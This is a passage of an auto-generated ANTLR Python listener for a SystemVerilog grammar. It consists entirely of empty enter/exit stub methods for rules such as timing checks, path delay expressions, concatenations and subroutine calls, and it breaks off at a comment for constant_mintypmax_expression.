def enterList_of_path_outputs(self, ctx:SystemVerilogParser.List_of_path_outputsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_path_outputs.
def exitList_of_path_outputs(self, ctx:SystemVerilogParser.List_of_path_outputsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#specify_input_terminal_descriptor.
def enterSpecify_input_terminal_descriptor(self, ctx:SystemVerilogParser.Specify_input_terminal_descriptorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#specify_input_terminal_descriptor.
def exitSpecify_input_terminal_descriptor(self, ctx:SystemVerilogParser.Specify_input_terminal_descriptorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#specify_output_terminal_descriptor.
def enterSpecify_output_terminal_descriptor(self, ctx:SystemVerilogParser.Specify_output_terminal_descriptorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#specify_output_terminal_descriptor.
def exitSpecify_output_terminal_descriptor(self, ctx:SystemVerilogParser.Specify_output_terminal_descriptorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#input_identifier.
def enterInput_identifier(self, ctx:SystemVerilogParser.Input_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#input_identifier.
def exitInput_identifier(self, ctx:SystemVerilogParser.Input_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#output_identifier.
def enterOutput_identifier(self, ctx:SystemVerilogParser.Output_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#output_identifier.
def exitOutput_identifier(self, ctx:SystemVerilogParser.Output_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#path_delay_value.
def enterPath_delay_value(self, ctx:SystemVerilogParser.Path_delay_valueContext):
pass
# Exit a parse tree produced by SystemVerilogParser#path_delay_value.
def exitPath_delay_value(self, ctx:SystemVerilogParser.Path_delay_valueContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_path_delay_expressions.
def enterList_of_path_delay_expressions(self, ctx:SystemVerilogParser.List_of_path_delay_expressionsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_path_delay_expressions.
def exitList_of_path_delay_expressions(self, ctx:SystemVerilogParser.List_of_path_delay_expressionsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#t_path_delay_expression.
def enterT_path_delay_expression(self, ctx:SystemVerilogParser.T_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#t_path_delay_expression.
def exitT_path_delay_expression(self, ctx:SystemVerilogParser.T_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#trise_path_delay_expression.
def enterTrise_path_delay_expression(self, ctx:SystemVerilogParser.Trise_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#trise_path_delay_expression.
def exitTrise_path_delay_expression(self, ctx:SystemVerilogParser.Trise_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tfall_path_delay_expression.
def enterTfall_path_delay_expression(self, ctx:SystemVerilogParser.Tfall_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tfall_path_delay_expression.
def exitTfall_path_delay_expression(self, ctx:SystemVerilogParser.Tfall_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tz_path_delay_expression.
def enterTz_path_delay_expression(self, ctx:SystemVerilogParser.Tz_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tz_path_delay_expression.
def exitTz_path_delay_expression(self, ctx:SystemVerilogParser.Tz_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#t01_path_delay_expression.
def enterT01_path_delay_expression(self, ctx:SystemVerilogParser.T01_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#t01_path_delay_expression.
def exitT01_path_delay_expression(self, ctx:SystemVerilogParser.T01_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#t10_path_delay_expression.
def enterT10_path_delay_expression(self, ctx:SystemVerilogParser.T10_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#t10_path_delay_expression.
def exitT10_path_delay_expression(self, ctx:SystemVerilogParser.T10_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#t0z_path_delay_expression.
def enterT0z_path_delay_expression(self, ctx:SystemVerilogParser.T0z_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#t0z_path_delay_expression.
def exitT0z_path_delay_expression(self, ctx:SystemVerilogParser.T0z_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tz1_path_delay_expression.
def enterTz1_path_delay_expression(self, ctx:SystemVerilogParser.Tz1_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tz1_path_delay_expression.
def exitTz1_path_delay_expression(self, ctx:SystemVerilogParser.Tz1_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#t1z_path_delay_expression.
def enterT1z_path_delay_expression(self, ctx:SystemVerilogParser.T1z_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#t1z_path_delay_expression.
def exitT1z_path_delay_expression(self, ctx:SystemVerilogParser.T1z_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tz0_path_delay_expression.
def enterTz0_path_delay_expression(self, ctx:SystemVerilogParser.Tz0_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tz0_path_delay_expression.
def exitTz0_path_delay_expression(self, ctx:SystemVerilogParser.Tz0_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#t0x_path_delay_expression.
def enterT0x_path_delay_expression(self, ctx:SystemVerilogParser.T0x_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#t0x_path_delay_expression.
def exitT0x_path_delay_expression(self, ctx:SystemVerilogParser.T0x_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tx1_path_delay_expression.
def enterTx1_path_delay_expression(self, ctx:SystemVerilogParser.Tx1_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tx1_path_delay_expression.
def exitTx1_path_delay_expression(self, ctx:SystemVerilogParser.Tx1_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#t1x_path_delay_expression.
def enterT1x_path_delay_expression(self, ctx:SystemVerilogParser.T1x_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#t1x_path_delay_expression.
def exitT1x_path_delay_expression(self, ctx:SystemVerilogParser.T1x_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tx0_path_delay_expression.
def enterTx0_path_delay_expression(self, ctx:SystemVerilogParser.Tx0_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tx0_path_delay_expression.
def exitTx0_path_delay_expression(self, ctx:SystemVerilogParser.Tx0_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#txz_path_delay_expression.
def enterTxz_path_delay_expression(self, ctx:SystemVerilogParser.Txz_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#txz_path_delay_expression.
def exitTxz_path_delay_expression(self, ctx:SystemVerilogParser.Txz_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tzx_path_delay_expression.
def enterTzx_path_delay_expression(self, ctx:SystemVerilogParser.Tzx_path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tzx_path_delay_expression.
def exitTzx_path_delay_expression(self, ctx:SystemVerilogParser.Tzx_path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#path_delay_expression.
def enterPath_delay_expression(self, ctx:SystemVerilogParser.Path_delay_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#path_delay_expression.
def exitPath_delay_expression(self, ctx:SystemVerilogParser.Path_delay_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#edge_sensitive_path_declaration.
def enterEdge_sensitive_path_declaration(self, ctx:SystemVerilogParser.Edge_sensitive_path_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#edge_sensitive_path_declaration.
def exitEdge_sensitive_path_declaration(self, ctx:SystemVerilogParser.Edge_sensitive_path_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parallel_edge_sensitive_path_description.
def enterParallel_edge_sensitive_path_description(self, ctx:SystemVerilogParser.Parallel_edge_sensitive_path_descriptionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parallel_edge_sensitive_path_description.
def exitParallel_edge_sensitive_path_description(self, ctx:SystemVerilogParser.Parallel_edge_sensitive_path_descriptionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#full_edge_sensitive_path_description.
def enterFull_edge_sensitive_path_description(self, ctx:SystemVerilogParser.Full_edge_sensitive_path_descriptionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#full_edge_sensitive_path_description.
def exitFull_edge_sensitive_path_description(self, ctx:SystemVerilogParser.Full_edge_sensitive_path_descriptionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#data_source_expression.
def enterData_source_expression(self, ctx:SystemVerilogParser.Data_source_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#data_source_expression.
def exitData_source_expression(self, ctx:SystemVerilogParser.Data_source_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#edge_identifier.
def enterEdge_identifier(self, ctx:SystemVerilogParser.Edge_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#edge_identifier.
def exitEdge_identifier(self, ctx:SystemVerilogParser.Edge_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#state_dependent_path_declaration.
def enterState_dependent_path_declaration(self, ctx:SystemVerilogParser.State_dependent_path_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#state_dependent_path_declaration.
def exitState_dependent_path_declaration(self, ctx:SystemVerilogParser.State_dependent_path_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#polarity_operator.
def enterPolarity_operator(self, ctx:SystemVerilogParser.Polarity_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#polarity_operator.
def exitPolarity_operator(self, ctx:SystemVerilogParser.Polarity_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#system_timing_check.
def enterSystem_timing_check(self, ctx:SystemVerilogParser.System_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#system_timing_check.
def exitSystem_timing_check(self, ctx:SystemVerilogParser.System_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#setup_timing_check.
def enterSetup_timing_check(self, ctx:SystemVerilogParser.Setup_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#setup_timing_check.
def exitSetup_timing_check(self, ctx:SystemVerilogParser.Setup_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hold_timing_check.
def enterHold_timing_check(self, ctx:SystemVerilogParser.Hold_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#hold_timing_check.
def exitHold_timing_check(self, ctx:SystemVerilogParser.Hold_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#setuphold_timing_check.
def enterSetuphold_timing_check(self, ctx:SystemVerilogParser.Setuphold_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#setuphold_timing_check.
def exitSetuphold_timing_check(self, ctx:SystemVerilogParser.Setuphold_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#recovery_timing_check.
def enterRecovery_timing_check(self, ctx:SystemVerilogParser.Recovery_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#recovery_timing_check.
def exitRecovery_timing_check(self, ctx:SystemVerilogParser.Recovery_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#removal_timing_check.
def enterRemoval_timing_check(self, ctx:SystemVerilogParser.Removal_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#removal_timing_check.
def exitRemoval_timing_check(self, ctx:SystemVerilogParser.Removal_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#recrem_timing_check.
def enterRecrem_timing_check(self, ctx:SystemVerilogParser.Recrem_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#recrem_timing_check.
def exitRecrem_timing_check(self, ctx:SystemVerilogParser.Recrem_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#skew_timing_check.
def enterSkew_timing_check(self, ctx:SystemVerilogParser.Skew_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#skew_timing_check.
def exitSkew_timing_check(self, ctx:SystemVerilogParser.Skew_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timeskew_timing_check.
def enterTimeskew_timing_check(self, ctx:SystemVerilogParser.Timeskew_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timeskew_timing_check.
def exitTimeskew_timing_check(self, ctx:SystemVerilogParser.Timeskew_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#fullskew_timing_check.
def enterFullskew_timing_check(self, ctx:SystemVerilogParser.Fullskew_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#fullskew_timing_check.
def exitFullskew_timing_check(self, ctx:SystemVerilogParser.Fullskew_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#period_timing_check.
def enterPeriod_timing_check(self, ctx:SystemVerilogParser.Period_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#period_timing_check.
def exitPeriod_timing_check(self, ctx:SystemVerilogParser.Period_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#width_timing_check.
def enterWidth_timing_check(self, ctx:SystemVerilogParser.Width_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#width_timing_check.
def exitWidth_timing_check(self, ctx:SystemVerilogParser.Width_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#nochange_timing_check.
def enterNochange_timing_check(self, ctx:SystemVerilogParser.Nochange_timing_checkContext):
pass
# Exit a parse tree produced by SystemVerilogParser#nochange_timing_check.
def exitNochange_timing_check(self, ctx:SystemVerilogParser.Nochange_timing_checkContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timecheck_condition.
def enterTimecheck_condition(self, ctx:SystemVerilogParser.Timecheck_conditionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timecheck_condition.
def exitTimecheck_condition(self, ctx:SystemVerilogParser.Timecheck_conditionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#controlled_reference_event.
def enterControlled_reference_event(self, ctx:SystemVerilogParser.Controlled_reference_eventContext):
pass
# Exit a parse tree produced by SystemVerilogParser#controlled_reference_event.
def exitControlled_reference_event(self, ctx:SystemVerilogParser.Controlled_reference_eventContext):
pass
# Enter a parse tree produced by SystemVerilogParser#data_event.
def enterData_event(self, ctx:SystemVerilogParser.Data_eventContext):
pass
# Exit a parse tree produced by SystemVerilogParser#data_event.
def exitData_event(self, ctx:SystemVerilogParser.Data_eventContext):
pass
# Enter a parse tree produced by SystemVerilogParser#delayed_data.
def enterDelayed_data(self, ctx:SystemVerilogParser.Delayed_dataContext):
pass
# Exit a parse tree produced by SystemVerilogParser#delayed_data.
def exitDelayed_data(self, ctx:SystemVerilogParser.Delayed_dataContext):
pass
# Enter a parse tree produced by SystemVerilogParser#delayed_reference.
def enterDelayed_reference(self, ctx:SystemVerilogParser.Delayed_referenceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#delayed_reference.
def exitDelayed_reference(self, ctx:SystemVerilogParser.Delayed_referenceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#end_edge_offset.
def enterEnd_edge_offset(self, ctx:SystemVerilogParser.End_edge_offsetContext):
pass
# Exit a parse tree produced by SystemVerilogParser#end_edge_offset.
def exitEnd_edge_offset(self, ctx:SystemVerilogParser.End_edge_offsetContext):
pass
# Enter a parse tree produced by SystemVerilogParser#event_based_flag.
def enterEvent_based_flag(self, ctx:SystemVerilogParser.Event_based_flagContext):
pass
# Exit a parse tree produced by SystemVerilogParser#event_based_flag.
def exitEvent_based_flag(self, ctx:SystemVerilogParser.Event_based_flagContext):
pass
# Enter a parse tree produced by SystemVerilogParser#notifier.
def enterNotifier(self, ctx:SystemVerilogParser.NotifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#notifier.
def exitNotifier(self, ctx:SystemVerilogParser.NotifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#reference_event.
def enterReference_event(self, ctx:SystemVerilogParser.Reference_eventContext):
pass
# Exit a parse tree produced by SystemVerilogParser#reference_event.
def exitReference_event(self, ctx:SystemVerilogParser.Reference_eventContext):
pass
# Enter a parse tree produced by SystemVerilogParser#remain_active_flag.
def enterRemain_active_flag(self, ctx:SystemVerilogParser.Remain_active_flagContext):
pass
# Exit a parse tree produced by SystemVerilogParser#remain_active_flag.
def exitRemain_active_flag(self, ctx:SystemVerilogParser.Remain_active_flagContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timestamp_condition.
def enterTimestamp_condition(self, ctx:SystemVerilogParser.Timestamp_conditionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timestamp_condition.
def exitTimestamp_condition(self, ctx:SystemVerilogParser.Timestamp_conditionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#start_edge_offset.
def enterStart_edge_offset(self, ctx:SystemVerilogParser.Start_edge_offsetContext):
pass
# Exit a parse tree produced by SystemVerilogParser#start_edge_offset.
def exitStart_edge_offset(self, ctx:SystemVerilogParser.Start_edge_offsetContext):
pass
# Enter a parse tree produced by SystemVerilogParser#threshold.
def enterThreshold(self, ctx:SystemVerilogParser.ThresholdContext):
pass
# Exit a parse tree produced by SystemVerilogParser#threshold.
def exitThreshold(self, ctx:SystemVerilogParser.ThresholdContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timing_check_limit.
def enterTiming_check_limit(self, ctx:SystemVerilogParser.Timing_check_limitContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timing_check_limit.
def exitTiming_check_limit(self, ctx:SystemVerilogParser.Timing_check_limitContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timing_check_event.
def enterTiming_check_event(self, ctx:SystemVerilogParser.Timing_check_eventContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timing_check_event.
def exitTiming_check_event(self, ctx:SystemVerilogParser.Timing_check_eventContext):
pass
# Enter a parse tree produced by SystemVerilogParser#controlled_timing_check_event.
def enterControlled_timing_check_event(self, ctx:SystemVerilogParser.Controlled_timing_check_eventContext):
pass
# Exit a parse tree produced by SystemVerilogParser#controlled_timing_check_event.
def exitControlled_timing_check_event(self, ctx:SystemVerilogParser.Controlled_timing_check_eventContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timing_check_event_control.
def enterTiming_check_event_control(self, ctx:SystemVerilogParser.Timing_check_event_controlContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timing_check_event_control.
def exitTiming_check_event_control(self, ctx:SystemVerilogParser.Timing_check_event_controlContext):
pass
# Enter a parse tree produced by SystemVerilogParser#specify_terminal_descriptor.
def enterSpecify_terminal_descriptor(self, ctx:SystemVerilogParser.Specify_terminal_descriptorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#specify_terminal_descriptor.
def exitSpecify_terminal_descriptor(self, ctx:SystemVerilogParser.Specify_terminal_descriptorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#edge_control_specifier.
def enterEdge_control_specifier(self, ctx:SystemVerilogParser.Edge_control_specifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#edge_control_specifier.
def exitEdge_control_specifier(self, ctx:SystemVerilogParser.Edge_control_specifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#edge_descriptor.
def enterEdge_descriptor(self, ctx:SystemVerilogParser.Edge_descriptorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#edge_descriptor.
def exitEdge_descriptor(self, ctx:SystemVerilogParser.Edge_descriptorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#zero_or_one.
def enterZero_or_one(self, ctx:SystemVerilogParser.Zero_or_oneContext):
pass
# Exit a parse tree produced by SystemVerilogParser#zero_or_one.
def exitZero_or_one(self, ctx:SystemVerilogParser.Zero_or_oneContext):
pass
# Enter a parse tree produced by SystemVerilogParser#z_or_x.
def enterZ_or_x(self, ctx:SystemVerilogParser.Z_or_xContext):
pass
# Exit a parse tree produced by SystemVerilogParser#z_or_x.
def exitZ_or_x(self, ctx:SystemVerilogParser.Z_or_xContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timing_check_condition.
def enterTiming_check_condition(self, ctx:SystemVerilogParser.Timing_check_conditionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timing_check_condition.
def exitTiming_check_condition(self, ctx:SystemVerilogParser.Timing_check_conditionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#scalar_timing_check_condition.
def enterScalar_timing_check_condition(self, ctx:SystemVerilogParser.Scalar_timing_check_conditionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#scalar_timing_check_condition.
def exitScalar_timing_check_condition(self, ctx:SystemVerilogParser.Scalar_timing_check_conditionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#scalar_constant.
def enterScalar_constant(self, ctx:SystemVerilogParser.Scalar_constantContext):
pass
# Exit a parse tree produced by SystemVerilogParser#scalar_constant.
def exitScalar_constant(self, ctx:SystemVerilogParser.Scalar_constantContext):
pass
# Enter a parse tree produced by SystemVerilogParser#concatenation.
def enterConcatenation(self, ctx:SystemVerilogParser.ConcatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#concatenation.
def exitConcatenation(self, ctx:SystemVerilogParser.ConcatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_concatenation.
def enterConstant_concatenation(self, ctx:SystemVerilogParser.Constant_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_concatenation.
def exitConstant_concatenation(self, ctx:SystemVerilogParser.Constant_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_multiple_concatenation.
def enterConstant_multiple_concatenation(self, ctx:SystemVerilogParser.Constant_multiple_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_multiple_concatenation.
def exitConstant_multiple_concatenation(self, ctx:SystemVerilogParser.Constant_multiple_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_path_concatenation.
def enterModule_path_concatenation(self, ctx:SystemVerilogParser.Module_path_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_path_concatenation.
def exitModule_path_concatenation(self, ctx:SystemVerilogParser.Module_path_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_path_multiple_concatenation.
def enterModule_path_multiple_concatenation(self, ctx:SystemVerilogParser.Module_path_multiple_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_path_multiple_concatenation.
def exitModule_path_multiple_concatenation(self, ctx:SystemVerilogParser.Module_path_multiple_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#multiple_concatenation.
def enterMultiple_concatenation(self, ctx:SystemVerilogParser.Multiple_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#multiple_concatenation.
def exitMultiple_concatenation(self, ctx:SystemVerilogParser.Multiple_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#streaming_concatenation.
def enterStreaming_concatenation(self, ctx:SystemVerilogParser.Streaming_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#streaming_concatenation.
def exitStreaming_concatenation(self, ctx:SystemVerilogParser.Streaming_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#stream_operator.
def enterStream_operator(self, ctx:SystemVerilogParser.Stream_operatorContext):
pass
# Exit a parse tree produced by SystemVerilogParser#stream_operator.
def exitStream_operator(self, ctx:SystemVerilogParser.Stream_operatorContext):
pass
# Enter a parse tree produced by SystemVerilogParser#slice_size.
def enterSlice_size(self, ctx:SystemVerilogParser.Slice_sizeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#slice_size.
def exitSlice_size(self, ctx:SystemVerilogParser.Slice_sizeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#stream_concatenation.
def enterStream_concatenation(self, ctx:SystemVerilogParser.Stream_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#stream_concatenation.
def exitStream_concatenation(self, ctx:SystemVerilogParser.Stream_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#stream_expression.
def enterStream_expression(self, ctx:SystemVerilogParser.Stream_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#stream_expression.
def exitStream_expression(self, ctx:SystemVerilogParser.Stream_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#array_range_expression.
def enterArray_range_expression(self, ctx:SystemVerilogParser.Array_range_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#array_range_expression.
def exitArray_range_expression(self, ctx:SystemVerilogParser.Array_range_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#empty_unpacked_array_concatenation.
def enterEmpty_unpacked_array_concatenation(self, ctx:SystemVerilogParser.Empty_unpacked_array_concatenationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#empty_unpacked_array_concatenation.
def exitEmpty_unpacked_array_concatenation(self, ctx:SystemVerilogParser.Empty_unpacked_array_concatenationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#tf_call.
def enterTf_call(self, ctx:SystemVerilogParser.Tf_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#tf_call.
def exitTf_call(self, ctx:SystemVerilogParser.Tf_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#system_tf_call.
def enterSystem_tf_call(self, ctx:SystemVerilogParser.System_tf_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#system_tf_call.
def exitSystem_tf_call(self, ctx:SystemVerilogParser.System_tf_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#subroutine_call.
def enterSubroutine_call(self, ctx:SystemVerilogParser.Subroutine_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#subroutine_call.
def exitSubroutine_call(self, ctx:SystemVerilogParser.Subroutine_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#function_subroutine_call.
def enterFunction_subroutine_call(self, ctx:SystemVerilogParser.Function_subroutine_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#function_subroutine_call.
def exitFunction_subroutine_call(self, ctx:SystemVerilogParser.Function_subroutine_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_arguments.
def enterList_of_arguments(self, ctx:SystemVerilogParser.List_of_argumentsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_arguments.
def exitList_of_arguments(self, ctx:SystemVerilogParser.List_of_argumentsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_arguments_with_strings.
def enterList_of_arguments_with_strings(self, ctx:SystemVerilogParser.List_of_arguments_with_stringsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_arguments_with_strings.
def exitList_of_arguments_with_strings(self, ctx:SystemVerilogParser.List_of_arguments_with_stringsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#method_call_body.
def enterMethod_call_body(self, ctx:SystemVerilogParser.Method_call_bodyContext):
pass
# Exit a parse tree produced by SystemVerilogParser#method_call_body.
def exitMethod_call_body(self, ctx:SystemVerilogParser.Method_call_bodyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#built_in_method_call.
def enterBuilt_in_method_call(self, ctx:SystemVerilogParser.Built_in_method_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#built_in_method_call.
def exitBuilt_in_method_call(self, ctx:SystemVerilogParser.Built_in_method_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#array_manipulation_call.
def enterArray_manipulation_call(self, ctx:SystemVerilogParser.Array_manipulation_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#array_manipulation_call.
def exitArray_manipulation_call(self, ctx:SystemVerilogParser.Array_manipulation_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#array_method_call.
def enterArray_method_call(self, ctx:SystemVerilogParser.Array_method_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#array_method_call.
def exitArray_method_call(self, ctx:SystemVerilogParser.Array_method_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#iterator_argument.
def enterIterator_argument(self, ctx:SystemVerilogParser.Iterator_argumentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#iterator_argument.
def exitIterator_argument(self, ctx:SystemVerilogParser.Iterator_argumentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#randomize_call.
def enterRandomize_call(self, ctx:SystemVerilogParser.Randomize_callContext):
pass
# Exit a parse tree produced by SystemVerilogParser#randomize_call.
def exitRandomize_call(self, ctx:SystemVerilogParser.Randomize_callContext):
pass
# Enter a parse tree produced by SystemVerilogParser#array_method_name.
def enterArray_method_name(self, ctx:SystemVerilogParser.Array_method_nameContext):
pass
# Exit a parse tree produced by SystemVerilogParser#array_method_name.
def exitArray_method_name(self, ctx:SystemVerilogParser.Array_method_nameContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inc_or_dec_expression.
def enterInc_or_dec_expression(self, ctx:SystemVerilogParser.Inc_or_dec_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inc_or_dec_expression.
def exitInc_or_dec_expression(self, ctx:SystemVerilogParser.Inc_or_dec_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_expression.
def enterConstant_expression(self, ctx:SystemVerilogParser.Constant_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#constant_expression.
def exitConstant_expression(self, ctx:SystemVerilogParser.Constant_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#constant_mintypmax_expression.
